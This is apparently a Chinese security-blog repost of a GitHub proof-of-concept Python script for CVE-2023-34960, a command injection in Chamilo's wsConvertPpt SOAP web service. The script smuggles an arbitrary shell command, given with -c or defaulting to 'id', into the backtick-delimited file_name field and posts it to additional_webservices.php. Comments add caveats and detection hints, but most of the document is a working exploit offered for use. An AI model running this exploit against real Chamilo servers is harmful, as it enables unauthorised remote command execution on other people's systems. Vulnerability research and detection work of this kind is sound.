CVE-2023-34960 Chamilo PoC

作者:Sec-Labs | 发布时间:

项目地址

https://github.com/Aituglo/CVE-2023-34960

POC

poc.py

import argparse
import requests

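def execute_command(url, command):
    """Send the wsConvertPpt SOAP request for CVE-2023-34960 and report the outcome.

    The request is POSTed to
    ``<url>/main/webservices/additional_webservices.php``. ``url`` is also
    used as the ``ns1`` namespace, and ``command`` is interpolated into the
    ``file_name`` value of the SOAP map.

    Args:
        url: Base URL of the Chamilo instance, used as given (no
            normalisation of trailing slashes).
        command: Text placed into the ``file_name`` value.

    Returns:
        True when the server answers HTTP 200 and the body contains
        ``wsConvertPptResponse``; False otherwise, including on any
        connection or HTTP-layer error.

    Note for readers using this as a check: the response body is never
    inspected for command output. A True result therefore only shows that
    the web service endpoint is exposed and answered the SOAP call; it is
    not proof that anything executed, so confirm findings against the
    installed version and patch level. For detection, the request shape to
    look for is a POST to the path above carrying a ``wsConvertPpt`` body
    whose ``file_name`` value contains shell metacharacters.
    """
    body = '''<?xml version="1.0" encoding="UTF-8"?>
    <SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ns1="{}" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:ns2="http://xml.apache.org/xml-soap" xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><ns1:wsConvertPpt><param0 xsi:type="ns2:Map"><item><key xsi:type="xsd:string">file_data</key><value xsi:type="xsd:string"></value></item><item><key xsi:type="xsd:string">file_name</key><value xsi:type="xsd:string">{}`.pptx</value></item><item><key xsi:type="xsd:string">service_ppt2lp_size</key><value xsi:type="xsd:string">720x540</value></item></param0></ns1:wsConvertPpt></SOAP-ENV:Body></SOAP-ENV:Envelope>'''.format(url, command)

    try:
        response = requests.post(
            '{}/main/webservices/additional_webservices.php'.format(url),
            data=body,
            headers={
                'Content-Type': 'text/xml; charset=utf-8',
            },
            # Without a timeout an unresponsive host blocks the script forever.
            timeout=10,
        )
    except requests.RequestException:
        # Only network/HTTP failures count as "no answer". The original bare
        # ``except:`` also swallowed KeyboardInterrupt and SystemExit, which
        # made the script impossible to interrupt cleanly.
        return False

    # Presence of the response element only proves the service replied.
    return response.status_code == 200 and "wsConvertPptResponse" in response.text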

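# Command-line entry point: -u is the base URL of the Chamilo instance,
# -c an optional command string passed through to execute_command().
parser = argparse.ArgumentParser()
parser.add_argument("-u", "--url", help="Url of your Chamilo", required=True)
parser.add_argument("-c", "--command", help="Command to execute", required=False)

args = parser.parse_args()

# The messages below repeat execute_command()'s boolean, which is derived from
# the HTTP status and a marker string in the response, not from command
# output. Read "vulnerable" / "executed" as "endpoint answered the SOAP call".
if args.command is None:
    # No -c given: run the check with the fixed 'id' probe.
    if execute_command(args.url, 'id'):
        print(f"URL vulnerable: {args.url}")
    else:
        print(f"URL not vulnerable: {args.url}")
else:
    # The original had a further ``else`` after ``elif args.command is not
    # None``; that branch could never run and has been removed.
    if execute_command(args.url, args.command):
        print(f"Command executed: {args.command}")
    else:
        print(f"An error has occured, url is not vulnerable: {args.url}")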

 

标签:工具分享, POC脚本